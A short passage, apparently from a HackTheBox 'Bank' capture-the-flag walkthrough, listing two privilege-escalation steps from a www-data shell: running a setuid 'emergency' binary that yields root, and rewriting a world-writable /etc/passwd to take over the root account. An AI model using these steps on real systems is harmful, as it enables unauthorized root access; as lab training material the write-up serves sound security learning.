5 privesc

Method 1

www-data@bank:/var/www/bank/uploads$ var/htb/bin/emergency
whoami;id
root
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)

Method 2

# /etc/passwd is writable

www-data@bank:/var/www/bank/uploads$ ls -la /etc/passwd
-rw-rw-rw- 1 root root 1252 May 28  2017 /etc/passwd

# we can change password for root;
# su - root

Last updated